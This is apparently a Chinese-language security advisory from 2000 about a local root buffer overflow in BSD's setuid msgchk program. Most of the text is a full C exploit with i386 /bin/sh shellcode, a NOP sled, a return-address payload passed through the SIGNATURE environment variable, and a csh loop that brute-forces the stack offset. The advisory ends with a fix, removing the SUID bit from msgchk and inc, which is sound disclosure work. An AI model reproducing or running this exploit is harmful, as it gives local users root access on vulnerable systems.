FreeBSD/BSDI本地溢出

(2000-05-26 00:00 )(安络 )(不详 )
导读-- BSD的msgchk程序存在溢出允许本地用户获取root......
涉及程序：
/usr/contrib/mh/bin/msgchk

描述
BSD的msgchk程序存在溢出允许本地用户获取root

详细
该测试代码由 Linux 版本移植而来；按作者的说法，在 FreeBSD/BSDI 上亦测试通过（偏移量需按目标系统调整，见代码注释中的暴力枚举脚本）。
仅供安全研究,请勿滥用或者随意散播!

/* private */
/*
* mh/msgchk, mh/inc _demonstration_ LOCAL exploit for FreeBSD/BSDi
* ( ported from linux ) 4-Apr-1998 by stran9er
*
* Based:
* on some bsd_lpr_exploit.c by unknown author..
* and info from bugtraq
*
* Disclaimer:
* this program is for (demo) educational purposes only.
*/

#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Default offset added to the stack pointer sampled in this process to
 * guess where the payload lands inside the target (see main()).
 * Ranges noted by the original author:
 *   700..1500 step 100
 *   -3700..-2700 step 100
 *   -1000 for bsdi4
 * If none of these hits, brute-force the offset with a loop like the
 * one below (mh684bsd is the name the author gave the compiled binary):
 *
 *   #!/bin/csh
 *   set v = -5000
 *   while ($v < 5000)
 *       echo try $v
 *       ./mh684bsd $v
 *       @ v+=100
 *   end
 */
#define DEFAULT_OFFSET 1000

/* Size of the buffer handed to setenv("SIGNATURE", ...); its last byte is
 * the terminating NUL, so the environment value is BUFFER_SIZE-1 bytes. */
#define BUFFER_SIZE 4000
/* Bytes of NOP sled plus shellcode in front of the block of repeated
 * return addresses; main() places the shellcode so it ends exactly here. */
#define BUFFER_NOP 999

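/*
 * Return (an approximation of) the current stack pointer.  main() adds the
 * user-supplied offset to it to guess where the payload lands in msgchk.
 *
 * The original body was a bare `movl %esp,%eax` with no return statement:
 * it only "worked" because the i386 ABI returns a long in %eax.  Falling
 * off the end of a non-void function is undefined behaviour, and an
 * optimising compiler is free to drop or reorder code around it, so the
 * value is taken through a proper asm output operand instead.
 */
long get_esp(void)
{
    unsigned long sp;

#if defined(__i386__)
    __asm__ __volatile__ ("movl %%esp, %0" : "=r" (sp));
#else
    /* Not an i386 build (the only target this listing addresses): the
     * frame address is the closest portable stand-in, so the file still
     * compiles and the offset printout in main() stays meaningful. */
    sp = (unsigned long) __builtin_frame_address(0);
#endif
    return (long) sp;
}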

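/*
 * Build the oversized SIGNATURE value and exec the setuid msgchk with it.
 *
 * argv[1] (optional) is a decimal offset added to the stack pointer sampled
 * by get_esp() to form the return address written into the payload; the
 * csh loop in the header comment brute-forces it.
 *
 * Layout of the BUFFER_SIZE-byte value:
 *   [0, BUFFER_NOP - strlen(execshell))   NOP sled (0x90); its first bytes
 *                                         are overwritten by `prefix`
 *   [.., BUFFER_NOP)                      execshell
 *   [BUFFER_NOP, BUFFER_SIZE - 1)         guessed return address, repeated
 *   [BUFFER_SIZE - 1]                     terminating NUL
 *
 * i386-specific: the return address is written with the width of unsigned
 * long, which is 4 bytes on the target.  Because the value travels as a C
 * string, a 0x00 byte inside the guessed address truncates it there.
 *
 * Returns 1 on bad arguments, allocation/setenv failure, or when execl()
 * fails; on success the process image is replaced and main never returns.
 */
int main(int argc, char **argv)
{
    char execshell[] =
    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
    "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
    /* Header carried over from the Linux version of the exploit.  It is
     * copied WITHOUT its NUL terminator: the transcribed original used
     * strncpy(buff, prefix, 28) on this 27-character string, which also
     * copied the NUL and cut the environment value off right there, so
     * nothing behind it (sled, shellcode, addresses) reached msgchk. */
    static const char prefix[] = ":)From:md@lspvs.sorosis.ro ";
    int offset = DEFAULT_OFFSET;
    char *buff;
    size_t shell_len, words, i;
    unsigned long ret;

    if (argc > 1) {
        /* strtol instead of atoi so garbage or out-of-range input is
         * rejected rather than silently becoming 0 or wrapping. */
        char *end;
        long v;

        errno = 0;
        v = strtol(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || errno == ERANGE
            || v < INT_MIN || v > INT_MAX) {
            fprintf(stderr, "bad offset '%s'\n", argv[1]);
            return 1;
        }
        offset = (int) v;
    }
    fprintf(stderr, "\nUsing offset %d (esp==%lx)\n",
            offset, (unsigned long) get_esp());

    buff = malloc(BUFFER_SIZE);
    if (!buff) {
        printf("cant allocate memory\n");
        exit(EXIT_FAILURE);     /* the original exited 0 on failure */
    }

    /* NOP sled over the whole buffer, shellcode ending at BUFFER_NOP. */
    shell_len = strlen(execshell);
    memset(buff, 0x90, BUFFER_SIZE);
    memcpy(buff + BUFFER_NOP - shell_len, execshell, shell_len);

    /* Guessed return address; unsigned arithmetic keeps a negative offset
     * well-defined.  get_esp() is constant within this frame, so sample
     * it once instead of once per word as the original did. */
    ret = (unsigned long) get_esp() + (unsigned long) offset;

    /* Fill the tail with the address one word at a time.  The count comes
     * from the word size so the loop cannot overrun the buffer if long is
     * wider than 4 bytes, and memcpy avoids the misaligned store the
     * original made through an unsigned long * at an odd offset. */
    words = (BUFFER_SIZE - BUFFER_NOP) / sizeof ret;
    for (i = 0; i < words; i++)
        memcpy(buff + BUFFER_NOP + i * sizeof ret, &ret, sizeof ret);
    buff[BUFFER_SIZE - 1] = '\0';

    memcpy(buff, prefix, sizeof prefix - 1);

    fprintf(stderr, "\nesp+offset==%lx\n", ret);
    if (setenv("SIGNATURE", buff, 1) != 0) {
        perror("setenv");
        free(buff);
        return 1;
    }
    /* The sentinel must be a char * for a variadic call. */
    execl("/usr/contrib/mh/bin/msgchk", "msgchk", (char *) NULL);
    /* Alternate target named in the header comment:
     * execl("/usr/contrib/mh/bin/inc", "inc", (char *) NULL); */
    fprintf(stderr, "execl error...");
    free(buff);
    return 1;
}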
/* By cami, darknet */
/* private */



解决方案
去掉 /usr/contrib/mh/bin/msgchk 的 SUID 位（如 chmod u-s）。测试代码的说明中同样把 /usr/contrib/mh/bin/inc 列为目标，应一并检查并去掉其 SUID 位。